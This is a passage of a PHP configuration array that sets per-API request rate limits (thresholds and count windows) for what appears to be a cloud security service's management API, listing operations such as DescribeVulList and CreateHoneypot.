'ModifySoarStrategySubscribe'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SetClusterInterceptionConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBruteForceRecords'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSecurityEventMarkMissList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UninstallBackupClient'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListImageRegistryExtra'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBackupFiles'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyEmgVulSubmit'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCloudAssetSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBinarySecurityPolicies'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteTagWithUuid'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteAutoTagRules'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckWarnings'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAlarmMachineCount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateMaliciousFileWhitelistConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteK8sAccessInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAllImageBaseline'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAssetsPropertyItem'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'QueryDiscoverDatabase'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAllEntity'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeTraceInfoNode'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SaveCustomizeReportConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAutoDelConfig'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageGroupedVulList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAgentlessTaskCount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyContainerPluginRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListFileProtectPluginStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClusterImageSecuritySummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCustomizeReportList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteCycleTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCloudProductFieldStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockStart'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageRiskLevelStatistic'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetVirusScanLatestTaskStatistic'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RefreshContainerAssets'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateCustomizedDict'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAgentlessRelateMalicious'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateRestoreJob'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBruteForceSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateOpaClusterPlugin'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAssetSelectionSelectedTarget'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageSensitiveFileByKey'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockFileChangeStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSimilarEventScenarios'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetTenantCheckAvailable'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVendorList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListInstanceRiskNum'], ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListUnfinishedOnceTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateSwitchStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClusterHostSecuritySummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteGroup'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerTags'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListClusterCnnfStatusDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCommonOverallConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteSasContainerWebDefenseRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerServiceK8sClusterKritisStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockProcessStatus'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarPlaybookTaskDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RemoveCheckResultWhiteList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeDefaultKeyInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteContainerDefenseRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerGroupedFieldDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOnceTaskResultInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateBinarySecurityPolicy'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAssetRefreshTaskConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListBackupRecord'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyBinarySecurityPolicy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeScreenScoreThread'], ['threshold' => '15', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSuspiciousUUIDConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOssBucketScanStatistic'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeChartList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRestoreJobs'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSuspEventDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddProtectVpcList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAgentlessTaskUsedSizeEstimate'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyHybridProxyCluster'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SaveSuspEventUserSetting'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'StartIdcProbeScan'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageFixCycleConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeGroupedContainerInstances'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'JoinWebLockProcessWhiteList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyDingTalkStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOssBucketScanInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyClientUserDefineRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyOperateVul'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileUploadLimit'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateAntiBruteForceRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCanFixVulList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateWhiteList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyCount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyPropertyScheduleConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAssetsPropertyDetail'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperationCancelIgnoreSuspEvent'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeGroupedInstances'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteHybridProxyCluster'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerScanConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulWhitelist'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRiskType'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSasPmAgentList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRiskListCheckResult'], ['threshold' => '200', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateFileDetectUploadUrl'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'PublicPreCheckImageScanTask'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckWarningDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckStandard'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRiskCheckItemResult'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageSensitiveFileList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListContainerDefenseRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebPath'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateImageEventOperation'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateSuspEventNote'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCustomizeReportConfigDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetServiceTrail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateClientAlertMode'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarStrategyTasks'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCheckWarningMachines'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateAttackPathWhitelist'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateUniBackupPolicy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddClientUserDefineRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetDockerhubImageRiskStatistic'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListClientUserDefineRuleTypes'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateUserSetting'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RefreshRegistryToken'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOpaStrategyTemplateSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RefreshAssets'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockConfigList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUniBackupDatabase'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyImageFixCycleConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UninstallUniBackupAgent'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListSystemClientRules'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetServerlessAuthSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'BatchCreateMaliciousNote'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCanTrySas'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyServerlessAuthToMachine'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateOssBucketScanTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBackupClients'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAppVulScanCycle'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeRisks'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyLoginBaseConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAutoTagRules'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockInclusiveFileType'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyClientConfStrategy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ExportRecord'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteHybridProxy'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAuthVersionStatistic'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCloudAssetCriteria'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAttestor'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageBaselineCheckResult'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListImageBuildRiskItem'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeStrategy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpgradeVersionByUuids'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOpaStrategyDetailNew'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateCheckItem'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSupportedModules'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateAttackPathSensitiveAssetConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateOpaStrategyNew'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVersionConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteOssScanConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyStartVulScan'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAssetDetailByUuids'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetLastOnceTaskInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetStrategyTemplateDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListPrivateRegistryList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ConfirmVirusEvents'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CheckTrialFixCount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCustomizedDictUploadInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAntiBruteForceRules'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'QueryAttackCount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteMaliciousNote'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageInfoList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeOnceTaskLeafRecordPage'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateJenkinsImageRegistryName'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAgentlessSensitiveFileByKey'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateHybridProxy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUserBaselineAuthorization'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckTimeDimensionStatistic'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteVulWhitelist'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSyncAssetTaskList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeDingTalk'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SetBuildRiskDefineRuleConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeDynamicDict'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GenerateClusterScannerWebhookYaml'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SubmitTenantCheck'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'VerifyCheckResult'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulListPage'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetImageScanNumInPeriod'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdatePublishBatch'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerServiceK8sClusterNamespaces'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdatePostPaidBindRel'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListPodRisk'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddCloudVendorAccountAK'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeEmgUserAgreement'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OpenSensitiveFileScan'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAssetCleanConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListInterceptionHistory'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOpaClusterStrategyNew'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClientConfSetup'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckProcess'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExportInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSuspEventUserSetting'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeLoginSwitchConfigs'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSyncAssetTaskLogDetail'], ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeFieldStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyTypeScaItem'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetContainerDefenseRuleDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyClearLogstoreStorage'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateCustomizeReportStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyStrategyTarget'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerCriteria'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeGraph4InvestigationOnline'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAssetInfoPublish'], ['threshold' => '3', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ChangeSecurityScoreRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'IgnoreIdcProbeScanResult'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCloudAssetDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateSuspiciousOverallConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddContainerPluginRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAIAssetSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListContainerDefenseRuleClusters'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageBuildRiskByKey'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOperationCheck'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddCheckResultWhiteList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteServiceTrail'], ['threshold' => '60', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSnapshots'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListOssBucket'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockUpdateConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RemoveCheckInstanceResultWhiteList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdatePublishGraySwitch'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateSuspiciousTargetConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteImageVulWhitelist'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageBuildRiskList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CheckUserHasEcs'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyInterceptionTarget'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerServiceK8sClusters'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageVulList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteMaliciousFileWhitelistConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UnbindAegis'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteClientUserDefineRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListSystemClientRuleTypes'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOpaClusterNamespaceList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'StartDiscoverDatabaseTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'VerifyCheckCustomConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListRdDefaultSyncList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListVirusScanMachineEvent'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckItems'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DingTalkOnlineTest'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyRiskCheckStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeContainerApps'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetPublishCron'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetVulWhitelist'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeReportRecipientStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateCustomBlockRecord'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOpaClusterBaseLineList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAccountLabel'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateBucketScanTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeStrategyDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListInstanceRiskLevels'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateImageBaselineWhitelist'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddCheckInstanceResultWhiteList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBackupPolicies'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyHybridProxyPolicy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateWebLockFileEvents'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AdvanceSecurityEventOperations'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageSecurityScanCount'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListImageRisk'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyScaProcessDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckItemWarningSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateHoneypot'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyTagWithUuid'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetMaliciousFileWhitelistConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'PublicCreateImageScanTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateAttestor'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateCheckItem'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateAgentClientInstall'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetInterceptionSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeServiceLinkedRoleStatus'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBackUpExportInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSwitchRegionDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListImageRegistryRegion'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockProcessList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListClientUserDefineRules'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListInterceptionRulePage'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyAntiBruteForceRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListClusterPluginInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeInstallCode'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 